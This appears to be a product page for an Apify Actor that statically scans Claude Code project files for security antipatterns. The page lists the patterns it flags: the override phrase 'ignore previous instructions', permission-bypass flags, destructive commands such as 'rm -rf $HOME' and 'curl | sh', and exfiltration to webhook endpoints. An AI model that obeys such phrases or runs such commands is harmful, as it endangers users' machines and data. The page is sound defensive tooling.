CLAUDE.md Security Auditor

claudemd-security-auditor is an Apify Actor that scans any AI-agent project's CLAUDE.md, .claude/hooks/*, and settings for security antipatterns — hardcoded secrets, prompt-injection vectors, destructive commands, and exfiltration channels — and returns a severity-ranked JSON + Markdown audit. Use it before installing any community CLAUDE.md or skill, or as a CI gate on every PR that touches .claude/.

Best for / Not for

✓ Best for	✗ Not for
Pre-install audits of community Claude Code skills, plugins, and CLAUDE.md files	Real-time runtime monitoring — this is a static scanner
CI/CD pipeline gate on PRs touching CLAUDE.md or .claude/hooks/	Replacing a full SAST/SCA tool (it does AI-agent-specific patterns only)
Org-wide hygiene sweeps to catch accidentally committed sk-ant-* / ghp_* tokens	Private repos accessed without your paste (anonymous GitHub API only)

Example input → output

Input:

{
  "githubRepo": "anthropics/claude-code",
  "claudeMdContent": "",
  "hooksDirContent": ""
}

Output (truncated):

{
  "repo": "anthropics/claude-code",
  "audited_at": "2026-05-21T15:30:00.000Z",
  "summary": {
    "files_scanned": 4,
    "total_findings": 7,
    "by_severity": { "critical": 1, "high": 2, "medium": 3, "low": 1 }
  },
  "findings": [
    {
      "path": ".claude/hooks/deploy.sh",
      "line": 23,
      "severity": "critical",
      "category": "secret",
      "message": "Hardcoded Anthropic API key",
      "matched": "sk-ant-api03-Abc...",
      "context": "ANTHROPIC_API_KEY=sk-ant-api03-Abc..."
    }
  ]
}

A downloadable Markdown audit report is also written to the Key-Value Store as security-report.md.

FAQ

Does this work with Claude Code?

Yes — it's purpose-built for Claude Code projects. It understands CLAUDE.md, .claude/settings.json, .claude/hooks/*, .claude/skills/*, and the bypass-permissions / --dangerously-skip-permissions flags that are specific to Claude Code's permission model.

Is it free?

The first audit is a free trial. After that the Actor uses Apify's pay-per-event model at $0.25 per repo audit. You get JSON findings, the Markdown report, and 7-day result retention per run.

Does it scan private repos?

Not directly — the public version uses anonymous GitHub API. For private repos, paste the file contents into the claudeMdContent / hooksDirContent text inputs. The Actor only sees what you paste; nothing is stored outside the run's transient Apify storage.

Can I run it in CI?

Yes. Apify exposes the Actor as a REST endpoint, so you can trigger it from a GitHub Action on every PR that touches CLAUDE.md or .claude/. Parse the JSON output, fail the build on any critical finding.

Output format?

JSON dataset (one row per finding with path, line, severity, category, matched string, surrounding context) plus a Markdown report grouped by severity. Both are downloadable from the Apify Console or via REST API.

Rate limits?

The Actor itself does not hit external APIs heavily — it pulls 4 files per repo via anonymous GitHub API (limit 60 req/hour from anonymous IPs). For org-wide sweeps, batch across hours or paste content directly instead of querying GitHub.

Does this Actor have false positives?

Yes — particularly on the "prompt-injection" patterns. A doc that explains the pattern (e.g., "do NOT use --dangerously-skip-permissions") will trigger. Review every finding before acting.

What about the bypass-permissions flag — is that always bad?

It loses Claude Code's per-tool approval prompts, which is the primary safety layer for autonomous agents. The Actor flags it because most users don't know they're enabling it. There are legitimate uses (sandboxed CI environments), but they should be explicit.

Why is this important now?

CLAUDE.md and .claude/hooks/* are the only files that determine what Claude Code does autonomously on your machine. As skill/plugin distribution accelerates, you're going to install other people's configs. Scanning them is the same hygiene as scanning package.json for known vulnerabilities — and almost nobody does it yet.

What it checks

• Hardcoded secrets: Anthropic / OpenAI / GitHub / AWS / Supabase / Slack tokens that should be env vars
• Prompt-injection vectors: bypass-permissions, --dangerously-skip-permissions, "ignore previous instructions" patterns
• Destructive command exec: rm -rf $HOME, sudo rm, curl | sh, eval $var in hook scripts
• Permission antipatterns: chmod 777, world-writable assets
• Exfiltration channels: outbound curl / wget to dynamic webhook endpoints (webhook.site, requestbin, ngrok)

How to use

1. Paste a GitHub repo as owner/repo (e.g. anthropics/claude-code) into the GitHub repo field, OR paste your CLAUDE.md content into the textarea
2. (Optional) Paste concatenated hook scripts into the second textarea
3. Click Start
4. View results in the Output tab, or download the full Markdown report from the Storage tab → Key-Value Store → security-report.md

Input

• githubRepo — owner/repo format. Public repos only (no GitHub auth needed; rate-limited to 60 req/hour from anonymous IPs)
• claudeMdContent — paste CLAUDE.md content directly (use if your repo is private)
• hooksDirContent — paste concatenated hook scripts for additional scanning

Severity scale

Severity	Examples	Action
Critical	Hardcoded API keys / tokens / private keys	Rotate immediately, never commit
High	Prompt-injection patterns, rm -rf $HOME, curl | sh, JWT in code	Fix before merging
Medium	chmod 777, eval $var, suspicious outbound URLs	Review and remediate
Low	TODO comments in security-sensitive files	Optional cleanup

Pricing

Pay-per-event model on Apify:

• First audit: free trial
• Per-audit rate: $0.25 per repo audit
• What you get: JSON findings + Markdown report + 7-day result retention

Need a full team audit + remediation PR? See the author's $499 Custom Hook Development service at landing-ianymu.vercel.app.

Support

Issues / feature requests: open in the Issues tab on the Apify console for this Actor.

Built by Ian Mu — github.com/ianymu — also author of verify-before-stop, the open-source Claude Code Stop hook against false completion claims.